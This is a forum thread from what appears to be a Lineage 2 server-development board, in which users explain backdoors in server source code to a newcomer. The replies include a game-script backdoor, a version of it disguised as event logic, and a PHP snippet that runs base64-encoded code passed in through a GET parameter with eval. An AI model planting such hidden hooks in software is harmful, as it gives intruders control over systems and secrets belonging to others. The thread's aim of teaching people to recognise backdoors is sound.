Information to newbies

Horyon

Horyon

Пляшущий с бубном
Участник
Сообщения
220
Розыгрыши
0
Решения
4
Репутация
53
Реакции
77
Баллы
273
Хроники
  1. Shadow of the Kamael
Исходники
Присутствуют
Сборка
L2jMobius Master class ch2
Hello guys.

Yesterday i was reading some posts and find that thing make me want to know about. The subject is "backdoor". From the conversation looks like it is a vulnerability in the source project that alow the creator of this backdoor make "bad" stuff.

Can one of you take some minutes for share some knowledge about it?

Ty in advance.
 
Решение
default_npc
This is a primitive example, but it will show a rough direction.

C#: 
EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.
Сортировать по дате Сортировать по голосам
This is a primitive example, but it will show a rough direction.

C#: 
EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.
 
За 3 Против
Решение
default_npc,
default_npc написал(а):
This is a primitive example, but it will show a rough direction.

C#: 
 EventHandler ATTACKED( attacker )
    {
        if(attacker.name == "BackdoorBasya" && OwnItemCount(attacker, @adena) == 5120)
        {
            GiveItem1(attacker, @coin_of_luck, 1);
        }
    }

Char with name BackdoorBasya and adena amount in inventory 5120, after every hit npc - get 1 CoL.

This only example. By itself, a good backdoor does not look like that, sometimes it's almost impossible to find.
Нажмите, чтобы раскрыть...

hmmmmm... so basically its custom stuff inside a project(source) that the owner put to have ways to exploit one server that use his files.

the mobius source have that kind of stuff?

Anyway ty for info default i get it.
 
За 0 Против
Horyon написал(а):
default_npc,


hmmmmm... so basically its custom stuff inside a project(source) that the owner put to have ways to exploit one server that use his files.

the mobius source have that kind of stuff?

Anyway ty for info default i get it.
Нажмите, чтобы раскрыть...
Intruders try to hide backdoors.

As a simple example - code above can be:
C#: 
EVENT_COUNT = 5120;
...
MANA_AMOUNT = 57;
...
SAVE_EVENT_STATE = 4036;
...

function bool checkEventCondition( attacker , itemId)
{
    return OwnItemCount(attacker, itemId) == EVENT_COUNT;
}
...
function eventRequest( attacker,  operationId, type)
{
    GiveItem1(attacker, operationId, type);
}
...
function EventHandler ATTACKED( attacker )
{
    local string event_npc;
    ...
    event_npc = "Piglet";
    ...
    if (attacker.name == event_npc && checkEventCondition(attacker, MANA_AMOUNT))
    {
        eventRequest(attacker, SAVE_EVENT_STATE, 1);
    }
   ...
}

It still do the same but a bit hidden(all code looks valid, and may be implemented in different parts of code).

Of course you don't really need a backdoor this way. You can hide code for remote contoll, add unhandled exeptions to broke some mechanics, add lower level code(that hard to read and understand) with custom script execution feature and etc.

Moreover, sometimes backdoors are created naturally without malicious intent
 
Последнее редактирование:
За 2 Против
Sometimes, you can find something more interesting and not clear as examples higher.
I am from web development, and working with php. but i thinks this approach can be used for Java too.

Lets think that $value is not static, we get in from post or get.
PHP: 
$settings = [
  'database_password' => 'secret value'
];
$value = 'dmFyX2R1bXAoJHNldHRpbmdzKTtleGl0KCk7';
eval(base64_decode($value));

As result, we will see
Форматирование (BB-код): 
afaibyshev@Antons-MacBook-Pro test % php hack.php
array(1) {
  ["database_password"]=>
  string(12) "secret value"
}

Logic is very simple:
$value is base64 hash of some code.
here it is 'var_dump($settings);exit();'
After it, we decode this value and make eval.
Eval - execute code)

Also, it is easy to hide some magic strings, with using headers, or GET, or POST.
PHP: 
$settings = [
  'database_password' => 'secret value'
];
$value = $_GET['hideErrors'] ?? '';
if (!empty($value)) {
    eval(base64_decode($value));
}

But, as you can see, we still use eval.


It is simple example for web, Java and server has more ways to do it....
So, good luck)
 
За 1 Против
Nice subject to know exist. Will now on, look more deeply the code.

Ty for all that take sometime to some time to explain it. :)
 
За 0 Против
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Zerox
  • Вопрос
How parser all info from pts or client to xml
Ответы
0
Просмотры
381
Zerox
Zerox
markodemarko
  • Вопрос
Help , i buy 800e 3 armor paint .. and now i need l2client dat editor in order to use them...
Ответы
4
Просмотры
571
markodemarko
markodemarko
Salty Mike
Мануал [GUIDE] How to make custom background color for tables on IL
Ответы
0
Просмотры
729
Salty Mike
Salty Mike
Salty Mike
  • Вопрос
[Q] How do you send IMAGE of monster/npc/boss from core to client 362?
Ответы
2
Просмотры
555
Salty Mike
Salty Mike
Salty Mike
LF person to make Interface.u/xdat changes to Master Class 362
Ответы
3
Просмотры
802
default_npc
default_npc
Назад
Сверху Снизу